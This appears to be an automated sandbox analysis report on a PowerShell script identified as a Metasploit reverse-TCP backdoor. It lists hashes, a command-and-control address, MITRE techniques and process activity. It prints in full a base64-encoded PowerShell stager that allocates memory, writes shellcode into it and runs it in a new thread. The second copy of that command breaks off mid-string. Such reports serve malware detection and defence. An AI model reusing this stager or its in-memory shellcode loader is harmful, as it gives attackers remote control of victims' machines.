metasploit | e8840dd3399e063dd23765bf82067c2f58f03cf3709e84d3dd85ffe99351a303

General

Target

ps1010.ps1
Size

7KB
MD5

3a857403ef0d05f9cce0527c8f50017e
SHA1

99f5796ce4360edd426b51b6039119e8935237da
SHA256

e8840dd3399e063dd23765bf82067c2f58f03cf3709e84d3dd85ffe99351a303
SHA512

2bd63b530ebe9c0f794517fe2bd5d958c9e20b8d386d40a47162484527db5db078e2f79d3608f1f5526dfeea7635cba4d65e786f046395a996add394a78d1e4e
SSDEEP

192:wk5qvXhjyhwvz2PrrdIbST3nKTwQXh9Le:wkcXhjyhGzudIk3K8QXhI

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

18.158.58.205:17973

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Blocklisted process makes network request 10 IoCs

Processes:

powershell.exe

flow	pid	Process
2	2988	powershell.exe
2	2988	powershell.exe
2	2988	powershell.exe
2	2988	powershell.exe
2	2988	powershell.exe
2	2988	powershell.exe
2	2988	powershell.exe
2	2988	powershell.exe
2	2988	powershell.exe
2	2988	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exe

pid	Process
1928	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

csc.execvtres.exepowershell.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
1928	powershell.exe
2380	powershell.exe
1472	powershell.exe
2988	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	1928	powershell.exe
Token: SeDebugPrivilege	2380	powershell.exe
Token: SeDebugPrivilege	1472	powershell.exe
Token: SeDebugPrivilege	2988	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.execsc.exe

description	pid	Process	procid_target
PID 1928 wrote to memory of 2380	1928	powershell.exe	32
PID 1928 wrote to memory of 2380	1928	powershell.exe	32
PID 1928 wrote to memory of 2380	1928	powershell.exe	32
PID 2380 wrote to memory of 1472	2380	powershell.exe	33
PID 2380 wrote to memory of 1472	2380	powershell.exe	33
PID 2380 wrote to memory of 1472	2380	powershell.exe	33
PID 1472 wrote to memory of 2988	1472	powershell.exe	34
PID 1472 wrote to memory of 2988	1472	powershell.exe	34
PID 1472 wrote to memory of 2988	1472	powershell.exe	34
PID 1472 wrote to memory of 2988	1472	powershell.exe	34
PID 2988 wrote to memory of 2772	2988	powershell.exe	35
PID 2988 wrote to memory of 2772	2988	powershell.exe	35
PID 2988 wrote to memory of 2772	2988	powershell.exe	35
PID 2988 wrote to memory of 2772	2988	powershell.exe	35
PID 2772 wrote to memory of 1856	2772	csc.exe	36
PID 2772 wrote to memory of 1856	2772	csc.exe	36
PID 2772 wrote to memory of 1856	2772	csc.exe	36
PID 2772 wrote to memory of 1856	2772	csc.exe	36

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ps1010.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1928
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -C "sv JG -;sv Hgs ec;sv b ((gv JG).value.toString()+(gv Hgs).value.toString());powershell (gv b).value.toString() 'JABqAFEAUABqACAAPQAgACcAJABvAFYAcQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABvAFYAcQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGEALAAwAHgAYwA1ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiAGIALAAwAHgAYwBkACwAMAB4ADQAZgAsADAAeAA2ADgALAAwAHgAZQA2ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADUAOAAsADAAeAAxADcALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMAAzACwAMAB4ADkANQAsADAAeAA1AGMALAAwAHgAOABhACwAMAB4ADEAMwAsADAAeABkADkALAAwAHgAOABiACwAMAB4AGMANQAsADAAeABkAGMALAAwAHgAMgAxACwAMAB4ADQAYwAsADAAeABiAGEALAAwAHgANQA1ACwAMAB4AGMANAAsADAAeAA3AGQALAAwAHgAZQA4ACwAMAB4ADAAMgAsADAAeAA4AGQALAAwAHgAMgBjACwAMAB4ADMAYwAsADAAeAA0ADAALAAwAHgAYwAzACwAMAB4AGQAYwAsADAAeABiADcALAAwAHgAMAA0ACwAMAB4AGYANwAsADAAeABkADMALAAwAHgANwAwACwAMAB4AGUAMgAsADAAeABkADEALAAwAHgANgAwACwAMAB4ADAAYwAsADAAeABkAGIALAAwAHgAMgBjACwAMAB4ADgAOAAsADAAeABjADAALAAwAHgAZABiACwAMAB4AGUAMgAsADAAeAA0AGEALAAwAHgANAAyACwAMAB4AGEAMAAsADAAeABmADgALAAwAHgAOQBlACwAMAB4AGEANAAsADAAeAA5ADkALAAwAHgAMwAzACwAMAB4AGQAMwAsADAAeABhADUALAAwAHgAZABlACwAMAB4ADgAMgAsADAAeAA5ADkALAAwAHgANABhACwAMAB4AGIAMgAsADAAeAA0ADMALAAwAHgAZQA5ACwAMAB4AGMANwAsADAAeAAyADMALAAwAHgAZQAwACwAMAB4AGEAZgAsADAAeABkAGIALAAwAHgANAAyACwAMAB4ADIANgAsADAAeABhADQALAAwAHgANgA0ACwAMAB4ADMAZAAsADAAeAA0ADMALAAwAHgANwBiACwAMAB4ADEAMAAsADAAeABmADEALAAwAHgANABhACwAMAB4AGEAYwAsADAAeAA4ADkALAAwAHgAOAAyACwAMAB4ADEANAAsADAAeAA2AGMALAAwAHgAMgBiACwAMAB4ADQANgAsADAAeAAyAGYALAAwAHgAMgA0ACwAMAB4ADMAMwAsADAAeABlAGQALAAwAHgAZQA2ACwAMAB4AGMAMQAsADAAeAA3AGYALAAwAHgAZABjACwAMAB4ADAANwAsADAAeAA2ADAALAAwAHgAMABiACwAMAB4ADIAYQAsADAAeAA3AGMALAAwAHgANwAyACwAMAB4AGQAZAAsADAAeAA2ADIALAAwAHgANAAyACwAMAB4AGQAOQAsADAAeAAyADAALAAwAHgANABiACwAMAB4ADQAZgAsADAAeAAyADMALAAwAHgANgA0ACwAMAB4ADYAYwAsADAAeABhAGYALAAwAHgANQA2ACwAMAB4ADkAZQAsADAAeAA4AGUALAAwAHgANQAyACwAMAB4ADYAMQAsADAAeAA2ADUALAAwAHgAZQBjACwAMAB4ADgAOAAsADAAeABlADQALAAwAHgANwBhACwAMAB4ADUANgAsADAAeAA1AGIALAAwAHgANQBlACwAMAB4ADUAZgAsADAAeAA2ADYALAAwAHgAOAA4ACwAMAB4ADMAOQAsADAAeAAxADQALAAwAHgANgA0ACwAMAB4ADYANQAsADAAeAA0AGQALAAwAHgANwAyACwAMAB4ADYAOQAsADAAeAA3ADgALAAwAHgAOAAyACwAMAB4ADAAOAAsADAAeAA5ADUALAAwAHgAZgAxACwAMAB4ADIANQAsADAAeABkAGYALAAwAHgAMQBmACwAMAB4ADQAMQAsADAAeAAwADIALAAwAHgAZgBiACwAMAB4ADQANAAsADAAeAAxADIALAAwAHgAMgBiACwAMAB4ADUAYQAsADAAeAAyADEALAAwAHgAZgA1ACwAMAB4ADUANAAsADAAeABiAGMALAAwAHgAOABkACwAMAB4AGEAYQAsADAAeABmADAALAAwAHgAYgA2ACwAMAB4ADMAYwAsADAAeABiAGQALAAwAHgAOAA1ACwAMAB4ADMANgAsADAAeABiAGYALAAwAHgAYwAyACwAMAB4AGQAYgAsADAAeABhADAALAAwAHgANwAzACwAMAB4ADAAZQAsADAAeABlADQALAAwAHgAMwAwACwAMAB4ADEAYwAsADAAeAAxADkALAAwAHgAOQA3ACwAMAB4ADAAMgAsADAAeAA4ADMALAAwAHgAYgAxACwAMAB4ADMAZgAsADAAeAAyAGYALAAwAHgANABjACwAMAB4ADEAZgAsADAAeABjADcALAAwAHgAMgA2ACwAMAB4ADUAYQAsADAAeABhADAALAAwAHgAMQA3ACwAMAB4ADgAMAAsADAAeAAwAGIALAAwAHgANQBmACwAMAB4ADkAOAAsADAAeABmADEALAAwAHgAMAAyACwAMAB4ADkAYgAsADAAeABjAGMALAAwAHgAYQAxACwAMAB4ADMAYwAsADAAeAAwAGEALAAwAHgANgBkACwAMAB4ADIAYQAsADAAeABiAGQALAAwAHgAYgAzACwAMAB4AGIAOAAsADAAeABjADcALAAwAHgAYgA3ACwAMAB4ADIAMwAsADAAeAA1ADEALAAwAHgAOAA2ACwAMAB4AGYAMgAsADAAeAA3AGUALAAwAHgAMwBkACwAMAB4AGIANAAsADAAeAAwADIALAAwAHgAYwA2ACwAMAB4ADgAYgAsADAAeAAzADEALAAwAHgAZQA0ACwAMAB4ADkANgAsADAAeABhADMALAAwAHgAMQAxACwAMAB4AGIAOQAsADAAeAA1ADYALAAwAHgAMQA0ACwAMAB4AGQAMgAsADAAeAA2ADkALAAwAHgAMwBlACwAMAB4ADcAZQAsADAAeABkAGQALAAwAHgANQA2ACwAMAB4ADUAZQAsADAAeAA4ADEALAAwAHgAMwA3ACwAMAB4AGYAZgAsADAAeABmADQALAAwAHgANgBlACwAMAB4AGUAZQAsADAAeAA1ADcALAAwAHgANgAwACwAMAB4ADEANgAsADAAeABhAGIALAAwAHgAMgBjACwAMAB4ADEAMQAsADAAeABkADcALAAwAHgANgAxACwAMAB4ADQAOQAsADAAeAAxADEALAAwAHgANQAzACwAMAB4ADgANgAsADAAeABhAGQALAAwAHgAZABmACwAMAB4ADkANAAsADAAeABlADMALAAwAHgAYgBkACwAMAB4AGIANwAsADAAeAA1ADQALAAwAHgAYgBlACwAMAB4ADkAYwAsADAAeAAxADEALAAwAHgANgBhACwAMAB4ADEANAAsADAAeAA4AGEALAAwAHgAOQBkACwAMAB4AGYAZQAsADAAeAA5ADMALAAwAHgAMQBkACwAMAB4AGMAYQAsADAAeAA5ADYALAAwAHgAOQA5ACwAMAB4ADcAOAAsADAAeAAzAGMALAAwAHgAMwA5ACwAMAB4ADYAMQAsADAAeABhAGYALAAwAHgAMwA3ACwAMAB4AGYAMAAsADAAeABmADcALAAwAHgAMQAwACwAMAB4ADIAZgAsADAAeABmAGQALAAwAHgAMQA3ACwAMAB4ADkAMQAsADAAeABhAGYALAAwAHgAYQBiACwAMAB4ADcAZAAsADAAeAA5ADEALAAwAHgAYwA3ACwAMAB4ADAAYgAsADAAeAAyADYALAAwAHgAYwAyACwAMAB4AGYAMgAsADAAeAA1ADMALAAwAHgAZgAzACwAMAB4ADcANgAsADAAeABhAGYALAAwAHgAYwAxACwAMAB4AGYAYwAsADAAeAAyAGUALAAwAHgAMQBjACwAMAB4ADQAMQAsADAAeAA5ADUALAAwAHgAYwBjACwAMAB4ADcAYgAsADAAeABhADUALAAwAHgAMwBhACwAMAB4ADIAZQAsADAAeABhAGUALAAwAHgAMwA3ACwAMAB4ADAANgAsADAAeABmADkALAAwAHgAOQA2ACwAMAB4ADQAZAAsADAAeAA2ADYALAAwAHgAMwA5ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABNAHoARwBBAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABNAHoARwBBAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABNAHoARwBBACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAagBRAFAAagApACkAOwAkAFAAQgBVAHoAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQASwBnAGEAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQASwBnAGEAIAAkAFAAQgBVAHoAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAUABCAFUAegAgACQAZQAiADsAfQA='"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2380
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABqAFEAUABqACAAPQAgACcAJABvAFYAcQAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABvAFYAcQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGEALAAwAHgAYwA1ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1ADgALAAwAHgAMwAxACwAMAB4AGMAOQAsADAAeABiAGIALAAwAHgAYwBkACwAMAB4ADQAZgAsADAAeAA2ADgALAAwAHgAZQA2ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADUAOAAsADAAeAAxADcALAAwAHgAOAAzACwAMAB4AGMAMAAsADAAeAAwADQALAAwAHgAMAAzACwAMAB4ADkANQAsADAAeAA1AGMALAAwAHgAOABhACwAMAB4ADEAMwAsADAAeABkADkALAAwAHgAOABiACwAMAB4AGMANQAsADAAeABkAGMALAAwAHgAMgAxACwAMAB4ADQAYwAsADAAeABiAGEALAAwAHgANQA1ACwAMAB4AGMANAAsADAAeAA3AGQALAAwAHgAZQA4ACwAMAB4ADAAMgAsADAAeAA4AGQALAAwAHgAMgBjACwAMAB4ADMAYwAsADAAeAA0ADAALAAwAHgAYwAzACwAMAB4AGQAYwAsADAAeABiADcALAAwAHgAMAA0ACwAMAB4AGYANwAsADAAeABkADMALAAwAHgANwAwACwAMAB4AGUAMgAsADAAeABkADEALAAwAHgANgAwACwAMAB4ADAAYwAsADAAeABkAGIALAAwAHgAMgBjACwAMAB4ADgAOAAsADAAeABjADAALAAwAHgAZABiACwAMAB4AGUAMgAsADAAeAA0AGEALAAwAHgANAAyACwAMAB4AGEAMAAsADAAeABmADgALAAwAHgAOQBlACwAMAB4AGEANAAsADAAeAA5ADkALAAwAHgAMwAzACwAMAB4AGQAMwAsADAAeABhADUALAAwAHgAZABlACwAMAB4ADgAMgAsADAAeAA5ADkALAAwAHgANABhACwAMAB4AGIAMgAsADAAeAA0ADMALAAwAHgAZQA5ACwAMAB4AGMANwAsADAAeAAyADMALAAwAHgAZQAwACwAMAB4AGEAZgAsADAAeABkAGIALAAwAHgANAAyACwAMAB4ADIANgAsADAAeABhADQALAAwAHgANgA0ACwAMAB4ADMAZAAsADAAeAA0ADMALAAwAHgANwBiACwAMAB4ADEAMAAsADAAeABmADEALAAwAHgANABhACwAMAB4AGEAYwAsADAAeAA4ADkALAAwAHgAOAAyACwAMAB4ADEANAAsADAAeAA2AGMALAAwAHgAMgBiACwAMAB4ADQANgAsADAAeAAyAGYALAAwAHgAMgA0ACwAMAB4ADMAMwAsADAAeABlAGQALAAwAHgAZQA2ACwAMAB4AGMAMQAsADAAeAA3AGYALAAwAHgAZABjACwAMAB4ADAANwAsADAAeAA2ADAALAAwAHgAMABiACwAMAB4ADIAYQAsADAAeAA3AGMALAAwAHgANwAyACwAMAB4AGQAZAAsADAAeAA2ADIALAAwAHgANAAyACwAMAB4AGQAOQAsADAAeAAyADAALAAwAHgANABiACwAMAB4ADQAZgAsADAAeAAyADMALAAwAHgANgA0ACwAMAB4ADYAYwAsADAAeABhAGYALAAwAHgANQA2ACwAMAB4ADkAZQAsADAAeAA4AGUALAAwAHgANQAyACwAMAB4ADYAMQAsADAAeAA2ADUALAAwAHgAZQBjACwAMAB4ADgAOAAsADAAeABlADQALAAwAHgANwBhACwAMAB4ADUANgAsADAAeAA1AGIALAAwAHgANQBlACwAMAB4ADUAZgAsADAAeAA2ADYALAAwAHgAOAA4ACwAMAB4ADMAOQAsADAAeAAxADQALAAwAHgANgA0ACwAMAB4ADYANQAsADAAeAA0AGQALAAwAHgANwAyACwAMAB4ADYAOQAsADAAeAA3ADgALAAwAHgAOAAyACwAMAB4ADAAOAAsADAAeAA5ADUALAAwAHgAZgAxACwAMAB4ADIANQAsADAAeABkAGYALAAwAHgAMQBmACwAMAB4ADQAMQAsADAAeAAwADIALAAwAHgAZgBiACwAMAB4ADQANAAsADAAeAAxADIALAAwAHgAMgBiACwAMAB4ADUAYQAsADAAeAAyADEALAAwAHgAZgA1ACwAMAB4ADUANAAsADAAeABiAGMALAAwAHgAOABkACwAMAB4AGEAYQAsADAAeABmADAALAAwAHgAYgA2ACwAMAB4ADMAYwAsADAAeABiAGQALAAwAHgAOAA1ACwAMAB4ADMANgAsADAAeABiAGYALAAwAHgAYwAyACwAMAB4AGQAYgAsADAAeABhADAALAAwAHgANwAzACwAMAB4ADAAZQAsADAAeABlADQALAAwAHgAMwAwACwAMAB4ADEAYwAsADAAeAAxADkALAAwAHgAOQA3ACwAMAB4ADAAMgAsADAAeAA4ADMALAAwAHgAYgAxACwAMAB4ADMAZgAsADAAeAAyAGYALAAwAHgANABjACwAMAB4ADEAZgAsADAAeABjADcALAAwAHgAMgA2ACwAMAB4ADUAYQAsADAAeABhADAALAAwAHgAMQA3ACwAMAB4ADgAMAAsADAAeAAwAGIALAAwAHgANQBmACwAMAB4ADkAOAAsADAAeABmADEALAAwAHgAMAAyACwAMAB4ADkAYgAsADAAeABjAGMALAAwAHgAYQAxACwAMAB4ADMAYwAsADAAeAAwAGEALAAwAHgANgBkACwAMAB4ADIAYQAsADAAeABiAGQALAAwAHgAYgAzACwAMAB4AGIAOAAsADAAeABjADcALAAwAHgAYgA3ACwAMAB4ADIAMwAsADAAeAA1ADEALAAwAHgAOAA2ACwAMAB4AGYAMgAsADAAeAA3AGUALAAwAHgAMwBkACwAMAB4AGIANAAsADAAeAAwADIALAAwAHgAYwA2ACwAMAB4ADgAYgAsADAAeAAzADEALAAwAHgAZQA0ACwAMAB4ADkANgAsADAAeABhADMALAAwAHgAMQAxACwAMAB4AGIAOQAsADAAeAA1ADYALAAwAHgAMQA0ACwAMAB4AGQAMgAsADAAeAA2ADkALAAwAHgAMwBlACwAMAB4ADcAZQAsADAAeABkAGQALAAwAHgANQA2ACwAMAB4ADUAZQAsADAAeAA4ADEALAAwAHgAMwA3ACwAMAB4AGYAZgAsADAAeABmADQALAAwAHgANgBlACwAMAB4AGUAZQAsADAAeAA1ADcALAAwAHgANgAwACwAMAB4ADEANgAsADAAeABhAGIALAAwAHgAMgBjACwAMAB4ADEAMQAsADAAeABkADcALAAwAHgANgAxACwAMAB4ADQAOQAsADAAeAAxADEALAAwAHgANQAzACwAMAB4ADgANgAsADAAeABhAGQALAAwAHgAZABmACwAMAB4ADkANAAsADAAeABlADMALAAwAHgAYgBkACwAMAB4AGIANwAsADAAeAA1ADQALAAwAHgAYgBlACwAMAB4ADkAYwAsADAAeAAxADEALAAwAHgANgBhACwAMAB4ADEANAAsADAAeAA4AGEALAAwAHgAOQBkACwAMAB4AGYAZQAsADAAeAA5ADMALAAwAHgAMQBkACwAMAB4AGMAYQAsADAAeAA5ADYALAAwAHgAOQA5ACwAMAB4ADcAOAAsADAAeAAzAGMALAAwAHgAMwA5ACwAMAB4ADYAMQAsADAAeABhAGYALAAwAHgAMwA3ACwAMAB4AGYAMAAsADAAeABmADcALAAwAHgAMQAwACwAMAB4ADIAZgAsADAAeABmAGQALAAwAHgAMQA3ACwAMAB4ADkAMQAsADAAeABhAGYALAAwAHgAYQBiACwAMAB4ADcAZAAsADAAeAA5ADEALAAwAHgAYwA3ACwAMAB4ADAAYgAsADAAeAAyADYALAAwAHgAYwAyACwAMAB4AGYAMgAsADAAeAA1ADMALAAwAHgAZgAzACwAMAB4ADcANgAsADAAeABhAGYALAAwAHgAYwAxACwAMAB4AGYAYwAsADAAeAAyAGUALAAwAHgAMQBjACwAMAB4ADQAMQAsADAAeAA5ADUALAAwAHgAYwBjACwAMAB4ADcAYgAsADAAeABhADUALAAwAHgAMwBhACwAMAB4ADIAZQAsADAAeABhAGUALAAwAHgAMwA3ACwAMAB4ADAANgAsADAAeABmADkALAAwAHgAOQA2ACwAMAB4ADQAZAAsADAAeAA2ADYALAAwAHgAMwA5ADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABNAHoARwBBAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABNAHoARwBBAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABNAHoARwBBACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7ACcAOwAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAagBRAFAAagApACkAOwAkAFAAQgBVAHoAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7